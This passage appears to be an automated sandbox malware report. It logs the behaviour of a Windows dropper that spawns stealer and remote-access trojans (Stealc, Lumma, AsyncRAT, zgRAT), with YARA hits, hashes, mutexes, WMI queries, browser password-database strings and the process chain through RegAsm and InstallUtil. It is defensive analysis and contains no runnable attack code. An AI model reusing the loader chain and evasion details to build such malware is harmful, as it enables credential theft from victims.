Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004EC390 16_2_004EC390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C7470 16_2_004C7470
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CB470 16_2_004CB470
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CE470 16_2_004CE470
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C5400 16_2_004C5400
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004D1420 16_2_004D1420
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004D0480 16_2_004D0480
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004ED56C 16_2_004ED56C
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004DE52C 16_2_004DE52C
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004ED58E 16_2_004ED58E
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F7620 16_2_004F7620
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C9737 16_2_004C9737
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C3790 16_2_004C3790
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F27B0 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C8810 16_2_004C8810
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004EC891 16_2_004EC891
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00509970 16_2_00509970
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CA910 16_2_004CA910
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C9A02 16_2_004C9A02
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00505AD0 16_2_00505AD0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00509B60 16_2_00509B60
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004E7B0F 16_2_004E7B0F
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004EBB00 16_2_004EBB00
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F8C00 16_2_004F8C00
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004FFD0E 16_2_004FFD0E
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00509E60 16_2_00509E60
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C7E70 16_2_004C7E70
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00507EDE 16_2_00507EDE
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004EDEF8 16_2_004EDEF8
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CFEBC 16_2_004CFEBC
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004FEF50 16_2_004FEF50
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CAFD0 16_2_004CAFD0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004EDFE0 16_2_004EDFE0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CBF80 16_2_004CBF80
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00508F80 16_2_00508F80
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_0319DC74 17_2_0319DC74
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058E6948 17_2_058E6948
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058E7C20 17_2_058E7C20
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058E0006 17_2_058E0006
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058E0040 17_2_058E0040
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058E7C10 17_2_058E7C10
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AFA3E8 17_2_06AFA3E8
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AFA3B7 17_2_06AFA3B7
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF6FEB 17_2_06AF6FEB
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF6FF8 17_2_06AF6FF8
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF6860 17_2_06AF6860
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Enables security privileges
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: String function: 004CED80 appears 194 times
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: String function: 004CCAD0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00407D30 appears 55 times
One or more processes crash
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 908
PE file contains more sections than normal
Source: Microsoft-Edge.exe.6.dr Static PE information: Number of sections : 18 > 10
Source: Microsoft-Edge[1].exe.6.dr Static PE information: Number of sections : 18 > 10
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: gold[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gold.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 12dsvc[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 12dsvc.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9970729734332425
Source: file.exe Static PE information: Section: tutljgzd ZLIB complexity 0.994399084512231
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9970729734332425
Source: axplong.exe.0.dr Static PE information: Section: tutljgzd ZLIB complexity 0.994399084512231
Source: random[1].exe.6.dr Static PE information: Section: llbyxbem ZLIB complexity 0.9949982080354484
Source: c6f71c9f40.exe.6.dr Static PE information: Section: llbyxbem ZLIB complexity 0.9949982080354484
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: random[1].exe0.6.dr Static PE information: Section: xmjcxhmw ZLIB complexity 0.9945782643016344
Source: 3ab68b6f1f.exe.6.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: 3ab68b6f1f.exe.6.dr Static PE information: Section: xmjcxhmw ZLIB complexity 0.9945782643016344
Source: axplong.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@60/100@15/16
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F81AA CoCreateInstance, 16_2_004F81AA
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\TSXTkO0pNBdN2KNw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: Yara match File source: 30.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000374B000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003735000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000003.2925273256.0000000021419000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000003.2938660339.0000000021435000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000003.3166207992.0000000020F9B000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000003.3138284444.0000000020FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe "C:\Users\user\AppData\Roaming\esFzLrEqPw.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe "C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe "C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 908
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" Jump to behavior
